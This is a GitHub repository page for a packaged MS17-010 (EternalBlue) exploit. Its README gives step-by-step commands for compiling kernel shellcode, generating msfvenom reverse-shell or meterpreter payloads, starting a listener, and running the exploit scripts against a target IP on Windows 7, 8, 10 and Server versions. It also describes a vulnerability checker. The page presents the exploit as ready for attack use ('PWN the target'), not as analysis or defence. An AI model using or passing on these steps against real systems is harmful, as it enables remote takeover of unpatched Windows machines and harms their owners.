Skip to content
This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010 AKA EternalBlue
Branch: master
Clone or download
Latest commit f26a76d Dec 31, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
shellcode added option to select staged or stageless payload in shell_prep.sh (#8) Oct 27, 2018
LICENSE Create LICENSE Nov 25, 2017
README.md Update README.md Dec 31, 2018
eternalblue_checker.py added initial exploit code Nov 25, 2017
eternalblue_exploit10.py eternal blue exploit for windows 10, same code as 8 just with notes f… Dec 31, 2018
eternalblue_exploit7.py added initial exploit code Nov 25, 2017
eternalblue_exploit8.py
listener_prep.sh listener_prep.sh modified for stageless/staged payloads Dec 31, 2018
mysmb.py

README.md

MS17-010 (ETERNAL BLUE) Exploit Code

This is some no-bs public exploit code that generates valid shellcode for the eternal blue exploit and scripts out the event listener with the metasploit multi-handler.

This version of the exploit is prepared in a way where you can exploit eternal blue WITHOUT metasploit. Your options for auto shell generation are to generate shellcode with msfvenom that has meterpreter (i.e. with metasploit) or to generate a normal windows cmd shell (i.e. without metasploit). You may also select between staged and stageless payloads if you wish to avoid utilizing the msfconsole entirely and use netcat/your own shell handler. Alternatively you can elect to brew in your own shellcode.

This allows for this version of the MS17-010 exploit to be a bit more flexible, and also fully functional, as many exploits leave out the steps to compile the kernel shellcode that usually comes with it.

Included is also an enternal blue checker script that allows you to test if your target is potentially vulnerable to MS17-010

run python eternalblue_checker.py <TARGET-IP>

TODO:

  1. Testing with non-msfvenom shellcode

VIDEO TUTORIAL:

https://www.youtube.com/watch?v=p9OnxS1oDc0

USAGE:

Navigate to the shellcode directory in the repo:

run ./shell_prep.sh

Follow the prompts, for example:

                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
<YOUR-IP>
LPORT you want x64 to listen on:
<SOME PORT>
LPORT you want x86 to listen on:
<SOME OTHER PORT>
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
0

After the script finishes there will be a shellcode binary named sc_all.bin in the shellcode directory

Next, navigate to the main repo directory:

run listener_prep.sh

Follow the prompts, for example:

 /,-
  ||)
  \\_, )
   `--'
Enternal Blue Metasploit Listener

LHOST for reverse connection:
<YOUR-IP>
LPORT for x64 reverse connection:
<SOME PORT>
LPORT for x86 reverse connection:
<SOME OTHER PORT>
Enter 0 for meterpreter shell or 1 for regular cmd shell:
0
Starting listener...

PWN:

If you have completed the USAGE steps, now you're ready to PWN the target.

run:

python eternalblue_exploit7.py <TARGET-IP> <PATH/TO/SHELLCODE/sc_all.bin> <Number of Groom Connections (optional)>

This has only been tested on Windows 7/Server 2008, and Windows 10 10240 (x64)

However the exploit included in this repo also includes the Windows 8/Server 2012 version and should work.

The original exploit code that this repo pulls from is located here: https://github.com/worawit/MS17-010

You can’t perform that action at this time.